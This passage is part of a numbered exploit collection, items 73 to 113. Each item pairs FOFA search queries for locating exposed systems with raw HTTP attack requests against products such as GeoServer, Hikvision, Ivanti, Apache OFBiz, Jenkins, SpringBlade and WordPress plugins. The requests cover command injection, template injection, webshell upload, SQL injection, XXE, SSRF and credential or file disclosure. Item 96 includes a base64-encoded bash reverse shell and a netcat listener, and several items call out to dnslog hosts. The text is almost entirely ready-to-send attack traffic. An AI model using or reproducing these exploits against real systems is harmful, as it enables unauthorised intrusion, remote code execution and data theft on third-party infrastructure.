S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远 M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 掌上校园 service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为 traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp
86. tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 of the XML file content; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
